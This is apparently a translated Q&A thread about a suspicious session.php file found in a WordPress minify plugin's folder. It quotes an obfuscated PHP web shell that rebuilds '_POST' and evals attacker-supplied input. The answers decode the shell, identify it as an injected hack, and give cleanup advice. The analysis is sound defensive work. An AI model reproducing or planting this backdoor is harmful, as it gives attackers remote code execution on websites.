<?php $qV="stop_";
$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
if(isset(${$s20}['q79c1ec']))
{
eval(${$s20}['q79c1ec']);
}
?>
https://wordpress.org/plugins/bwp-minify/
路径中的插件/ bwp-minify / min / lib / minify / js / session.php
答案 0 :(得分:0)
如果您从https://wordpress.org/plugins/bwp-minify/下载并检查插件,则可以看到存档中没有session.php文件。
有人在你的文件系统中注入了session.php。
该脚本正在尝试使用eval函数执行任何php代码。这肯定是一个安全问题,这就是您的提供商关闭您的网站的原因。
代码做了什么; 它尝试使用$ _POST [&#39; q79c1ec&#39;]变量,并通过将变量发布到您的Web服务器来运行任何PHP代码。
如果您调试可以看到的代码,$s20 = "_POST"和eval行的执行方式如eval($_POST['q79c1ec']);
答案 1 :(得分:0)
session.php文件不是有效的WordPress核心或插件文件,代码本身就是黑客攻击。
请仔细关注FAQ - My Site Was Hacked - WordPress Codex。
然后在WordPress Codex中查看Hardening WordPress和Brute Force Attacks中建议的安全措施。
更改所有密码。扫描您自己的电脑。告诉你的网站主人你被黑了;并考虑更改为更安全的主机:Recommended WordPress Web Hosting - WordPress Codex